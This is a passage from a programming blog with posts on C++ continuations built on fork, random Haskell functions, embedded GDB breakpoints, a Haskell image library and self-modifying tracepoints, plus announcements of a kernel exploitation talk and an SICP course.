(guess()) x--;<br /> <span class="kw">else</span> <span class="kw">if</span> (guess()) y++;<br /> <span class="kw">else</span> y--;<br /><br /> <span class="kw">if</span> ( (x < <span class="dv">0</span>) || (x >= maze_size) ||<br /> (y < <span class="dv">0</span>) || (y >= maze_size) )<br /> fail();<br /><br /> <span class="dt">const</span> <span class="dt">int</span> i = y*(maze_size<span class="dv">+1</span>) + x;<br /> <span class="kw">if</span> (maze[i] != ' ')<br /> fail();<br /> maze[i] = 'X';<br /> }<br /><br /> <span class="kw">for</span> (<span class="dt">char</span> c : maze) {<br /> <span class="kw">if</span> (c == 'X')<br /> std::cout << <span class="st">"</span><span class="ch">\e</span><span class="st">[1;32mX</span><span class="ch">\e</span><span class="st">[0m"</span>;<br /> <span class="kw">else</span><br /> std::cout << c;<br /> }<br />}</code></pre>
<p>Whether code or prose, the algorithm is pretty simple. Start at the upper-left corner. As long as we haven't reached the lower-right corner, guess a direction to move. Fail if we go off the edge, run into a wall, or find ourselves on a square we already visited.</p>
<p>Once we've reached the goal, we <a href="http://en.wikipedia.org/wiki/C%2B%2B11#Range-based_for-loop">iterate</a> over the <code>char</code> array and print it out with some rad <a href="http://pueblo.sourceforge.net/doc/manual/ansi_color_codes.html">ANSI color codes</a>.</p>
<p>Once again, we're making good use of the fact that our continuations reset global state. That's why we see <code>'X'</code> marks not on the failed detours, but only on a successful path through the maze. Here's what it looks like.</p>
<p><pre><code class="sourceCode">
<span class="kw">X</span>-------------+
<span class="kw">XXXXXXXX</span>| |
|--+ |<span class="kw">X</span>| | |
| | |<span class="kw">X</span>| --+ |
| |<span class="kw">XXXXX</span>| |
|-+---+--+-<span class="kw">X</span>| |
| |<span class="kw">XXX</span> | <span class="kw">XXX</span>|
| |<span class="kw">X</span>|<span class="kw">X</span>---+-+-<span class="kw">X</span>|
|<span class="kw">XXX</span>|<span class="kw">XXXXXX</span>|<span class="kw">XX</span>|
|<span class="kw">X</span>+-+-+--|<span class="kw">XXX</span> |
|<span class="kw">X</span>| | |--- |
|<span class="kw">XXXX</span> | |
|---<span class="kw">X</span>-+-------|
| <span class="kw">XXXXXXXXXXX</span>
+-------------<span class="kw">X</span>
</code></pre></p>
<h1 id="excess-backtracking">Excess backtracking</h1>
<p>We can run both examples in a single program.</p>
<pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">int</span> main() {<br /> factor(<span class="dv">391</span>);<br /> solve_maze();<br />}</code></pre>
<p>If we change the maze to be unsolvable, we'll get:</p>
<pre><code>17 * 23 = 391
23 * 17 = 391
Nothing to be done.
</code></pre>
<p>Factoring 391 a different way won't change the maze layout, but the program doesn't know that. We can add a <a href="http://en.wikipedia.org/wiki/Cut_%28logic_programming%29">cut</a> primitive to eliminate unwanted backtracking.</p>
<pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">void</span> cut() {<br /> checkpoint = boost::none;<br />}<br /><br /><span class="dt">int</span> main() {<br /> factor(<span class="dv">391</span>);<br /> cut();<br /> solve_maze();<br />}</code></pre><p></p>
<h1 id="the-implementation">The implementation</h1>
<p>For such a crazy idea, the code to implement <code>call_cc</code> with <code>fork</code> is actually pretty reasonable. Here's the core of it.</p>
<pre class="sourceCode"><code class="sourceCode cpp"><span class="kw">template</span> <<span class="kw">typename</span> T><br /><span class="co">// static</span><br />T cont<T>::call_cc(call_cc_arg f) {<br /> <span class="dt">int</span> fd[<span class="dv">2</span>];<br /> pipe(fd);<br /> <span class="dt">int</span> read_fd = fd[<span class="dv">0</span>];<br /> <span class="dt">int</span> write_fd = fd[<span class="dv">1</span>];<br /><br /> <span class="kw">if</span> (fork()) {<br /> <span class="co">// parent</span><br /> close(read_fd);<br /> <span class="kw">return</span> f( cont<T>(write_fd) );<br /> } <span class="kw">else</span> {<br /> <span class="co">// child</span><br /> close(write_fd);<br /> <span class="dt">char</span> buf[<span class="kw">sizeof</span>(T)];<br /> <span class="kw">if</span> (read(read_fd, buf, <span class="kw">sizeof</span>(T)) < ssize_t(<span class="kw">sizeof</span>(T)))<br /> exit(<span class="dv">0</span>);<br /> close(read_fd);<br /> <span class="kw">return</span> *<span class="kw">reinterpret_cast</span><T*>(buf);<br /> }<br />}<br /><br /><span class="kw">template</span> <<span class="kw">typename</span> T><br /><span class="dt">void</span> cont<T>::impl::invoke(<span class="dt">const</span> T &x) {<br /> write(m_pipe, &x, <span class="kw">sizeof</span>(T));<br /> exit(<span class="dv">0</span>);<br />}</code></pre>
<p>To capture a continuation, we fork the process. The resulting processes share a <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/pipe.2.html">pipe</a> which was created before the fork. The parent process will call <code>f</code> immediately, passing a <code>cont<T></code> object that holds onto the write end of this pipe. If that continuation is invoked with some argument <code>x</code>, the parent process will send <code>x</code> down the pipe and then exit. The child process wakes up from its <code>read</code> call, and returns <code>x</code> from <code>call_cc</code>.</p>
<p>There are a few more implementation details.</p>
<ul class="incremental">
<li><p>If the parent process exits, it will close the write end of the pipe, and the child's <code>read</code> will return 0, i.e. end-of-file. This prevents a buildup of unused continuation processes. But what if the parent deletes the last copy of some <code>cont<T></code>, yet keeps running? We'd like to kill the corresponding child process immediately.</p>
<p>This sounds like a use for a reference-counted smart pointer, but we want to hide this detail from the user. So we split off a private implementation class, <code>cont<T>::impl</code>, with a destructor that calls <code>close</code>. The user-facing class <code>cont<T></code> holds a <a href="http://en.cppreference.com/w/cpp/memory/shared_ptr"><code>std::shared_ptr</code></a> to a <code>cont<T>::impl</code>. And <code>cont<T>::operator()</code> simply calls <code>cont<T>::impl::invoke</code> through this pointer.</p></li>
<li><p>It would be nice to tell the compiler that <code>cont<T>::operator()</code> won't return, to avoid warnings like "control reaches end of non-void function". GCC provides the <a href="http://gcc.gnu.org/onlinedocs/gcc/Function-Attributes.html#index-g_t_0040code_007bnoreturn_007d-function-attribute-2543"><code>noreturn</code> attribute</a> for this purpose.</p></li>
<li><p>We want the <code>cont<T></code> constructor to be private, so we had to make <code>call_cc</code> a static member function of that class. But the examples above use a free function <code>call_cc<T></code>. It's easiest to implement the latter as a 1-line function that calls the former. The alternative is to make it a <a href="http://www.parashift.com/c++-faq-lite/friends.html">friend</a> function of <code>cont<T></code>, which requires some forward declarations and other noise.</p></li>
</ul>
<p>There are a number of limitations too.</p>
<ul class="incremental">
<li><p>As noted, the forked child process doesn't see changes to the parent's global state. This precludes some interesting uses of continuations, like implementing <a href="http://en.wikipedia.org/wiki/Continuation#Coroutines">coroutines</a>. In fact, I had trouble coming up with any application other than backtracking. You could work around this limitation with <a href="http://www.boost.org/doc/libs/1_48_0/doc/html/interprocess/quick_guide.html">shared memory</a>, but it seemed like too much hassle.</p></li>
<li><p>Each captured continuation can only be invoked once. This is easiest to observe if the code using continuations also invokes <code>fork</code> directly. It could possibly be fixed with additional <code>fork</code>ing inside <code>call_cc</code>.</p></li>
<li><p>Calling a continuation sends the argument through a pipe using a naive byte-for-byte copy. So the argument needs to be <a href="http://www.fnal.gov/docs/working-groups/fpcltf/Pkg/ISOcxx/doc/POD.html">Plain Old Data</a>, and had better not contain pointers to anything not shared by the two processes. This means we can't send continuations through other continuations, sad to say.</p></li>
<li><p>I left out the error handling you would expect in serious code, because this is anything but.</p></li>
<li><p>Likewise, I'm assuming that a single <code>write</code> and <code>read</code> will suffice to send the value. Robust code will need to loop until completion, handle <code>EINTR</code>, etc. Or use some higher-level IPC mechanism.</p></li>
<li><p>At some size, stack-allocating the receive buffer will become a problem.</p></li>
<li><p>It's slow. Well, actually, I'm impressed with the speed of <code>fork</code> on Linux. My machine solves both backtracking problems in about a second, <code>fork</code>ing about 2000 processes along the way. You can speed it up more with <a href="http://9fans.net/archive/2009/02/422">static linking</a>. But it's still far more overhead than the alternatives.</p></li>
</ul>
<p>As usual, you can get the code from <a href="https://github.com/kmcallister/cccallcc">GitHub</a>.</p>keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com65tag:blogger.com,1999:blog-1563623855220143059.post-30135619004046937032012-02-02T13:24:00.000-08:002012-02-02T13:35:21.740-08:00Generating random functions<p>How can we pick a random Haskell function? Specifically, we want to write an IO action</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">randomFunction </span><span class="ot">::</span> <span class="dt">IO</span> (<span class="dt">Integer</span> <span class="ot">-></span> <span class="dt">Bool</span>)</code></pre>
<p>with this behavior:</p>
<ul class="incremental">
<li><p>It produces a function of type <code>Integer -> Bool</code>.</p></li>
<li><p>It always produces a total function — a function which never throws an exception or enters an infinite loop.</p></li>
<li><p>It is equally likely to produce <em>any</em> such function.</p></li>
</ul>
<p>This is tricky, because there are infinitely many such functions (more on that later).</p>
<p>In another language we might produce something which looks like a function, but actually flips a coin on each new integer input. It would use mutable state to remember previous results, so that future calls will be consistent. But the Haskell type we gave for <code>randomFunction</code> forbids this approach. <code>randomFunction</code> uses IO effects to pick a random function, but the function it picks has access to neither coin flips nor mutable state.</p>
<p>Alternatively, we could build a lazy infinite data structure containing all the <code>Bool</code> answers we need. <code>randomFunction</code> could generate an <a href="http://lambda.haskell.org/platform/doc/current/ghc-doc/libraries/random-1.0.0.3/System-Random.html#v:randomRs">infinite list of random <code>Bool</code>s</a>, and produce a function <code>f</code> which indexes into that list. But this indexing will be inefficient in space and time. If the user calls <code>(f 10000000)</code>, we'll have to run 10,000,000 steps of the pseudo-random number generator, and build 10,000,000 list elements, before we can return a single <code>Bool</code> result.</p>
<p>We can improve this considerably by using a different infinite data structure. Though our solution is pure functional code, we <em>do</em> end up relying on mutation — the implicit mutation by which lazy thunks become evaluated data.</p>
<h1 id="the-data-structure">The data structure</h1>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">import</span> <span class="dt">System.Random</span><br /><span class="kw">import</span> <span class="dt">Data.List</span> ( genericIndex )</code></pre>
<p>Our data structure is an infinite binary tree:</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">data</span> <span class="dt">Tree</span> <span class="fu">=</span> <span class="dt">Node</span> <span class="dt">Bool</span> <span class="dt">Tree</span> <span class="dt">Tree</span></code></pre>
<p>We can interpret such a tree as a function from non-negative <code>Integer</code>s to <code>Bool</code>s. If the <code>Integer</code> argument is zero, the root node holds our <code>Bool</code> answer. Otherwise, we shift off the least-significant bit of the argument, and look at the left or right subtree depending on that bit.</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">get </span><span class="ot">::</span> <span class="dt">Tree</span> <span class="ot">-></span> (<span class="dt">Integer</span> <span class="ot">-></span> <span class="dt">Bool</span>)<br />get (<span class="dt">Node</span> b _ _) <span class="dv">0</span> <span class="fu">=</span> b<br />get (<span class="dt">Node</span> _ x y) n <span class="fu">=</span><br /> <span class="kw">case</span> <span class="fu">divMod</span> n <span class="dv">2</span> <span class="kw">of</span><br /> (m, <span class="dv">0</span>) <span class="ot">-></span> get x m<br /> (m, _) <span class="ot">-></span> get y m</code></pre>
<p>Now we need to build a suitable tree, starting from a <a href="http://lambda.haskell.org/platform/doc/current/ghc-doc/libraries/random-1.0.0.3/System-Random.html#t:StdGen">random number generator state</a>. The standard <code>System.Random</code> module is not going to win any <a href="http://www.serpentine.com/blog/2009/09/19/a-new-pseudo-random-number-generator-for-haskell/">speed contests</a>, but it does have one extremely nice property: it supports an operation</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">split </span><span class="ot">::</span> <span class="dt">StdGen</span> <span class="ot">-></span> (<span class="dt">StdGen</span>, <span class="dt">StdGen</span>)</code></pre>
<p>The two generator states returned by <code>split</code> will (ideally) produce two independent streams of random values. We use <code>split</code> at each node of the infinite tree.</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">build </span><span class="ot">::</span> <span class="dt">StdGen</span> <span class="ot">-></span> <span class="dt">Tree</span><br />build g0 <span class="fu">=</span><br /> <span class="kw">let</span> (b, g1) <span class="fu">=</span> random g0<br /> (g2, g3) <span class="fu">=</span> split g1<br /> <span class="kw">in</span> <span class="dt">Node</span> b (build g2) (build g3)</code></pre>
<p>This is a recursive function with no base case. Conceptually, it produces an infinite tree. Operationally, it produces a single <code>Node</code> constructor, whose fields are lazily-deferred computations. As <code>get</code> explores this notional infinite tree, new <code>Node</code>s are created and randomness generated on demand.</p>
<p><code>get</code> traverses one level per bit of its input integer. So looking up the integer <em>n</em> involves traversing and possibly creating <span style="white-space: nowrap;"><em>O</em>(log <em>n</em>)</span> nodes. This suggests good space and time efficiency, though only testing will say for sure.</p>
<p>Now we have all the pieces to solve the original puzzle. We build two trees, one to handle positive numbers and another for negative numbers.</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">randomFunction </span><span class="ot">::</span> <span class="dt">IO</span> (<span class="dt">Integer</span> <span class="ot">-></span> <span class="dt">Bool</span>)<br />randomFunction <span class="fu">=</span> <span class="kw">do</span><br /> neg <span class="ot"><-</span> build <span class="ot">`fmap`</span> newStdGen<br /> pos <span class="ot"><-</span> build <span class="ot">`fmap`</span> newStdGen<br /> <span class="kw">let</span> f n <span class="fu">|</span> n <span class="fu"><</span> <span class="dv">0</span> <span class="fu">=</span> get neg (<span class="fu">-</span>n)<br /> <span class="fu">|</span> <span class="fu">otherwise</span> <span class="fu">=</span> get pos n<br /> <span class="fu">return</span> f</code></pre>
<h1 id="testing">Testing</h1>
<p>Here's some code which helps us visualize one of these functions in the vicinity of zero:</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">test </span><span class="ot">::</span> (<span class="dt">Integer</span> <span class="ot">-></span> <span class="dt">Bool</span>) <span class="ot">-></span> <span class="dt">IO</span> ()<br />test f <span class="fu">=</span> <span class="fu">putStrLn</span> <span class="fu">$</span> <span class="fu">map</span> (char <span class="fu">.</span> f) [<span class="fu">-</span><span class="dv">40</span><span class="fu">..</span><span class="dv">40</span>] <span class="kw">where</span><br /> char <span class="dt">False</span> <span class="fu">=</span> <span class="ch">' '</span><br /> char <span class="dt">True</span> <span class="fu">=</span> <span class="ch">'-'</span></code></pre>
<p>Now we can test <code>randomFunction</code> in GHCi:</p>
<pre><code><span class="Prompt">λ></span> <span class="Entry">randomFunction >>= test</span>
---- - --- - - - - -- - - - -- --- -- -- - -- - - -- --- --
<span class="Prompt">λ></span> <span class="Entry">randomFunction >>= test</span>
- ---- - - - - - - -- - - --- --- -- - -- - -- - - - - - -- -
<span class="Prompt">λ></span> <span class="Entry">randomFunction >>= test</span>
- --- - - - -- --- - -- - - - - - ---- - - --- - - -
</code></pre>
<p>Each result from <code>randomFunction</code> is indeed a function: it always gives the same output for a given input. This much should be clear from the fact that we haven't used any <a href="http://lambda.haskell.org/platform/doc/current/ghc-doc/libraries/base-4.3.1.0/System-IO-Unsafe.html">unsafe shenanigans</a>. But we can also demonstrate it empirically:</p>
<pre><code><span class="Prompt">λ></span> <span class="Entry">f <- randomFunction</span>
<span class="Prompt">λ></span> <span class="Entry">test f</span>
- ----- - - -- - - --- -- - - - - - - -- - - ---- - - - - - ---
<span class="Prompt">λ></span> <span class="Entry">test f</span>
- ----- - - -- - - --- -- - - - - - - -- - - ---- - - - - - ---
</code></pre>
<p>Let's also test the speed on some very large arguments:</p>
<pre><code><span class="Prompt">λ></span> <span class="Entry">:set +s</span>
<span class="Prompt">λ></span> <span class="Entry">f 10000000</span>
True
(0.03 secs, 12648232 bytes)
<span class="Prompt">λ></span> <span class="Entry">f (2^65536)</span>
True
(1.10 secs, 569231584 bytes)
<span class="Prompt">λ></span> <span class="Entry">f (2^65536)</span>
True
(0.26 secs, 426068040 bytes)
</code></pre>
<p>The second call with <code>2^65536</code> is faster because the tree nodes already exist in memory. We can expect our tests to be faster yet if we compile with <code>ghc -O</code> rather than using GHCi's bytecode interpreter.</p>
<h1 id="how-many-functions">How many functions?</h1>
<p>Assume we have infinite memory, so that <code>Integer</code>s really can be unboundedly large. And let's ignore negative numbers, for simplicity. How many total functions of type <code>Integer -> Bool</code> are there?</p>
<p>Suppose we made an infinite list <code>xs</code> of all such functions. Now consider this definition:</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">diag </span><span class="ot">::</span> [<span class="dt">Integer</span> <span class="ot">-></span> <span class="dt">Bool</span>] <span class="ot">-></span> (<span class="dt">Integer</span> <span class="ot">-></span> <span class="dt">Bool</span>)<br />diag xs n <span class="fu">=</span> <span class="fu">not</span> <span class="fu">$</span> genericIndex xs n n</code></pre>
<p>For an argument <code>n</code>, <code>diag xs</code> looks at what the <code>n</code>th function of <code>xs</code> would return, and returns the opposite. This means the function <code>diag xs</code> differs from every function in our supposedly comprehensive list of functions. This contradiction shows that there are <a href="http://en.wikipedia.org/wiki/Uncountable_set">uncountably many</a> total functions of type <code>Integer -> Bool</code>. It's closely related to <a href="http://en.wikipedia.org/wiki/Cantor%27s_diagonal_argument">Cantor's diagonal argument</a> that the real numbers are uncountable.</p>
<p>But wait, there are only countably many Haskell programs! In fact, you can encode each one as a number. There may be uncountably many functions, but there are only a countable number of <em>computable</em> functions. So the proof breaks down if you restrict it to a real programming language like Haskell.</p>
<p>In that context, the existence of <code>xs</code> implies that there is some <em>algorithm</em> to enumerate the computable total functions. This is the assumption we ultimately contradict. The set of computable total functions is not <a href="http://en.wikipedia.org/wiki/Recursively_enumerable_language">recursively enumerable</a>, even though it is countable. Intuitively, to produce a single element of this set, we would have to verify that the function halts on every input, which is <a href="http://en.wikipedia.org/wiki/Halting_problem">impossible in the general case</a>.</p>
<p>Now let's revisit <code>randomFunction</code>. Any function it produces is computable: the algorithm is a combination of the pseudo-random number procedure and our tree traversal. In this sense, <code>randomFunction</code> provides extremely poor randomness; it only selects values from a particular <a href="http://en.wikipedia.org/wiki/Null_set">measure zero</a> subset of its result type! But if you read the type constructor <code>(->)</code> as "computable function", as one should in a programming language, then <code>randomFunction</code> is closer to doing what it says it does.</p>
<p><strong>Edit:</strong> See also Luke Palmer's <a href="http://lukepalmer.wordpress.com/2012/01/26/computably-uncountable/">recent article on this subject</a>.</p>
<h1 id="see-also">See also</h1>
<p>The libraries <a href="http://hackage.haskell.org/package/data-memocombinators">data-memocombinators</a> and <a href="http://hackage.haskell.org/package/MemoTrie">MemoTrie</a> use similar structures, not for building random functions but for <a href="http://en.wikipedia.org/wiki/Memoization">memoizing</a> existing ones.</p>
<p>You can download this post as a <a href="https://github.com/kmcallister/blog-misc/blob/master/random-function/random-function.lhs">Literate Haskell file</a> and play with the code.</p>keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com85tag:blogger.com,1999:blog-1563623855220143059.post-85516021441361317942012-01-28T09:02:00.000-08:002012-01-28T09:02:23.660-08:00Writing kernel exploits<p>Yesterday I gave a talk about writing kernel exploits. I've posted the <a href="http://ugcs.net/~keegan/talks/kernel-exploit/talk.pdf">slides [PDF]</a>. Here is the original description:</p>
<blockquote>
<p>Did you know that a NULL pointer can compromise your entire system? Do you know how UNIX pipes, multithreading, and an obscure network protocol from 1981 are combined to take over Linux machines today? OS kernels are full of strange and interesting vulnerabilities, thanks to the subtle nature of systems code. And the kernel's ultimate authority is the ultimate prize for an attacker.</p>
<p>In this talk you will learn how kernel exploits work, with detailed code examples. Compared to userspace, exploiting the kernel requires a whole different bag of tricks, and we'll cover some of the most important ones. We will focus on Linux systems and x86 hardware, though most ideas will generalize. We'll start with a few toy examples, then look at some real, high-profile Linux exploits from the past two years.</p>
<p>You will also see how to protect your own Linux machines against kernel exploits. We'll talk about the continual cat-and-mouse game between system administrators and those who would attack even hardened kernels.</p>
</blockquote>
<p>Thanks again to <a href="http://sipb.mit.edu/">SIPB</a> for giving me a venue to talk about whatever I find interesting.</p>keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com41tag:blogger.com,1999:blog-1563623855220143059.post-36871440621730921772012-01-19T09:51:00.000-08:002012-01-19T09:51:52.208-08:00Embedding GDB breakpoints in C source code<p>Have you ever wanted to embed <a href="http://www.gnu.org/software/gdb/">GDB</a> breakpoints in C source code?</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="ot">#include &lt;stdio.h&gt;</span><br /><br /><span class="dt">int</span> main() {<br /> printf(<span class="st">"Hello,</span><span class="ch">\n</span><span class="st">"</span>);<br /> EMBED_BREAKPOINT;<br /> printf(<span class="st">"world!</span><span class="ch">\n</span><span class="st">"</span>);<br /> EMBED_BREAKPOINT;<br /> <span class="kw">return</span> <span class="dv">0</span>;<br />}</code></pre>
<p>One way is to directly insert your CPU's breakpoint instruction. On x86:</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="ot">#define EMBED_BREAKPOINT</span> <span class="kw">asm</span> <span class="kw">volatile</span> (<span class="st">"int3;"</span>)</code></pre>
<p>There are at least two problems with this approach:</p>
<ul class="incremental">
<li><p>They aren't real GDB breakpoints. You can't <code>disable</code> them, count how many times they've been hit, etc.</p></li>
<li><p>If you run the program outside GDB, the breakpoint instruction will crash your process.</p></li>
</ul>
<p>Here is a small hack which solves both problems:</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="ot">#define EMBED_BREAKPOINT</span> \
<span class="kw">asm</span>(<span class="st">"0:"</span> \
<span class="st">".pushsection embed-breakpoints;"</span> \
<span class="st">".quad 0b;"</span> \
<span class="st">".popsection;"</span>)</code></pre>
<p>We place a <a href="http://sourceware.org/binutils/docs-2.21/as/Symbol-Names.html#index-local-labels-217">local label</a> into the instruction stream, and then save its address in the <code>embed-breakpoints</code> linker section.</p>
<p>Then we need to convert these addresses into GDB <code>breakpoint</code> commands. I wrote a tool that does this, as a wrapper for the <code>gdb</code> command. Here's how it works, on our initial example:</p>
<pre><code><span class="Prompt">$</span> <span class="Entry">gcc -g -o example example.c</span>
<span class="Prompt">$</span> <span class="Entry">./gdb-with-breakpoints ./example</span>
Reading symbols from example...done.
Breakpoint 1 at 0x4004f2: file example.c, line 8.
Breakpoint 2 at 0x4004fc: file example.c, line 10.
<span class="Prompt">(gdb)</span> <span class="Entry">run</span>
Starting program: example
Hello,
Breakpoint 1, main () at example.c:8
8 printf("world!\n");
<span class="Prompt">(gdb)</span> <span class="Entry">info breakpoints</span>
Num Type Disp Enb Address What
1 breakpoint keep y 0x00000000004004f2 in main at example.c:8
breakpoint already hit 1 time
2 breakpoint keep y 0x00000000004004fc in main at example.c:10
</code></pre>
<p>If we run the program normally, or in GDB without the wrapper, the <code>EMBED_BREAKPOINT</code> statements do nothing. The breakpoint addresses aren't even loaded into memory, because the <code>embed-breakpoints</code> section is not marked as <a href="http://sourceware.org/binutils/docs/as/Section.html#index-Section-Stack-443">allocatable</a>.</p>
<p>You can find all of the code <a href="https://github.com/kmcallister/embedded-breakpoints">on GitHub</a> under a BSD license. I've done only minimal testing, but I hope it will be a useful debugging tool for someone. Let me know if you find any bugs or improvements. You can comment here, or find my email address on GitHub.</p>
<p>I'm not sure about the decision to write the GDB wrapper in C using <a href="http://sourceware.org/binutils/docs/bfd/">BFD</a>. I also considered Haskell and <a href="http://hackage.haskell.org/package/elf"><code>elf</code></a>, or Python and the new <a href="http://eli.thegreenplace.net/2012/01/06/pyelftools-python-library-for-parsing-elf-and-dwarf/">pyelftools</a>. One can probably do something nicer using the GDB <a href="http://sourceware.org/gdb/onlinedocs/gdb/Python.html">Python API</a>, which was added <a href="http://lwn.net/Articles/356044/">a few years ago</a>.</p>
<p>This code depends on a GNU toolchain: it uses GNU C extensions, GNU assembler syntax, and BFD. The GDB wrapper uses the Linux <a href="http://www.kernel.org/doc/man-pages/online/pages/man5/proc.5.html"><code>proc</code> filesystem</a>, so that it can pass to GDB a temporary file which has already been <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/unlink.2.html">unlinked</a>. You could port it to other UNIX systems by changing the tempfile handling. It should work on a variety of CPU architectures, but I've only tested it on 32- and 64-bit x86.</p>keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com761tag:blogger.com,1999:blog-1563623855220143059.post-42456080454893310872012-01-09T22:41:00.000-08:002012-01-10T01:04:00.829-08:00Zombie 6.001 starts tomorrow!<p>The <a href="http://web.mit.edu/alexmv/6.S184/">student-run revival</a> of MIT's <a href="http://sicp.csail.mit.edu/Spring-2007/">famous intro CS class</a> starts tomorrow! 6.001 and its text <a href="http://mitpress.mit.edu/sicp/full-text/book/book.html"><em>SICP</em></a> had a singular influence on the teaching of introductions to computer science — not to be confused with intro to programming, worthwhile though that subject may be. After the unfortunate demise of 6.001 at MIT, some former TAs reanimated the class as an intense four-week experience. As <a href="http://web.mit.edu/alexmv/6.S184/">their description</a> says:</p>
<blockquote>
<p>Zombie-like, 6.001 rises from the dead to threaten students again. Unlike a zombie, though, it's moving quite a bit faster than it did the first time. Like the original, don't walk into the class expecting that it will teach you Scheme; instead, it attempts to teach thought patterns for computer science, and the structure and interpretation of computer programs. Three projects will be assigned and graded. Prereq: some programming experience; high confusion threshold.</p>
</blockquote>
<p>I'm helping teach it this year, and it should be a lot of fun. You can <a href="http://web.mit.edu/alexmv/6.S184/">follow along online</a> or if you're in the area, come to lectures Tuesdays and Thursdays, 19:00 to 21:00 in 32-044 (that's MIT building 32, room 044).</p>keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com80tag:blogger.com,1999:blog-1563623855220143059.post-83750497028465449842011-12-21T16:59:00.000-08:002011-12-21T16:59:42.185-08:00Propane: Functional synthesis of images and animations in Haskell<p>I just released <a href="http://hackage.haskell.org/package/propane">Propane</a>, a Haskell libary for functional synthesis of images and animations. This is a generalization of my <a href="http://repa.ouroborus.net/">Repa</a>-based <a href="http://mainisusuallyafunction.blogspot.com/2011/10/quasicrystals-as-sums-of-waves-in-plane.html">quasicrystal code</a>.</p>
<p>It's based on the same ideas as <a href="http://conal.net/Pan/">Pan</a> and some other projects. An image is a function assigning a color to each point in the plane. Similarly, an animation assigns an image to each point in time. Haskell's tools for functional and declarative programming can be used directly on images and animations.</p>
<p>For example, you can draw a red-green gradient like so:</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">import</span> <span class="dt">Propane</span><br /><br />main <span class="fu">=</span> saveImage <span class="st">"out.png"</span> (<span class="dt">Size</span> <span class="dv">400</span> <span class="dv">400</span>) im <span class="kw">where</span><br /> im (x,y) <span class="fu">=</span> cRGB (unbal x) (unbal y) <span class="dv">0</span></code></pre>
<p>Here <code>im</code> is the image as a function, mapping an (<em>x</em>,<em>y</em>) coordinate to a color. <code>unbal</code> is a function provided by Propane, which just maps the interval [-1, 1] to [0, 1].</p>
<p>The source package includes an animated quasicrystal and several other <a href="https://github.com/kmcallister/propane/tree/master/examples">examples</a>. Propane uses <a href="http://repa.ouroborus.net/">Repa</a> for data-parallel array computations. That means it automatically uses multiple CPU cores for rendering, provided the program is compiled and run with threads enabled. That said, it's not yet been optimized for speed in other ways.</p>
<p>This is just a toy right now, but do let me know if you come up with cool enhancements or examples!</p>keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com133tag:blogger.com,1999:blog-1563623855220143059.post-64818000660238725332011-11-07T05:39:00.000-08:002011-11-07T05:53:21.824-08:00Self-modifying code for debug tracing in quasi-C<p>Printing a program's state as it runs is the simple but effective debugging tool of programmers everywhere. For efficiency, we usually disable the most verbose output in production. But sometimes you need to diagnose a problem in a deployed system. It would be convenient to declare "tracepoints" and enable them at runtime, like so:</p>
<pre class="sourceCode"><code class="sourceCode c">tracepoint foo_entry;<br /><br /><span class="dt">int</span> foo(<span class="dt">int</span> n) {<br /> TRACE(foo_entry, <span class="st">"called foo(%d)</span><span class="ch">\n</span><span class="st">"</span>, n);<br /> <span class="co">// ...</span><br />}<br /><br /><span class="co">// Called from UI, monitoring interface, etc.</span><br /><span class="dt">void</span> debug_foo() {<br /> enable(&foo_entry);<br />}</code></pre>
<p>Here's a simple implementation of this API:</p>
<pre class="sourceCode"><code class="sourceCode c"><span class="kw">typedef</span> <span class="dt">int</span> tracepoint;<br /><br /><span class="ot">#define TRACE(_point, _args...) \
do { \
if (_point) printf(_args); \
} while (0)</span><br /><br /><span class="dt">static</span> <span class="kw">inline</span> <span class="dt">void</span> enable(tracepoint *point) {<br /> *point = <span class="dv">1</span>;<br />}</code></pre>
<p>Each tracepoint is simply a global variable. The construct <code>do { ... } while (0)</code> is a standard trick to make macro-expanded code play nicely with its surroundings. We also use GCC's syntax for <a href="http://gcc.gnu.org/onlinedocs/gcc/Variadic-Macros.html#Variadic-Macros">macros with a variable number of arguments</a>.</p>
<p>This approach does introduce a bit of overhead. One concern is that reading a global variable will cause a cache miss and will also evict a line of useful data from the cache. There's also some impact from adding a branch instruction. We'll develop a significantly more complicated implementation which avoids both of these problems.</p>
<p>Our new solution will be specific to <a href="http://en.wikipedia.org/wiki/X86-64">x86-64</a> processors running Linux, though the idea can be ported to other platforms. This approach is inspired by various self-modifying-code schemes in the Linux kernel, such as <a href="http://lwn.net/Articles/343766/">ftrace</a>, <a href="http://lwn.net/Articles/132196/">kprobes</a>, <a href="http://lwn.net/Articles/245671/">immediate values</a>, etc. It's mostly intended as an example of how these tricks work. The code in this article is not production-ready.</p>
<h1 id="the-design">The design</h1>
<p>Our new <code>TRACE</code> macro will produce code like the following pseudo-assembly:</p>
<pre class="sourceCode"><code class="sourceCode nasm"><span class="fu">foo:</span><br /> ...<br /> <span class="co">; code before tracepoint</span><br /> ...<br /><span class="fu">tracepoint:</span><br /> <span class="kw">nop</span><br /><span class="fu">after_tracepoint:</span><br /> ...<br /> <span class="co">; rest of function</span><br /> ...<br /> <span class="kw">ret</span><br /><br /><span class="fu">do_tracepoint:</span><br /> <span class="kw">push</span> args to printf<br /> <span class="kw">call</span> printf<br /> <span class="kw">jmp</span> after_tracepoint</code></pre>
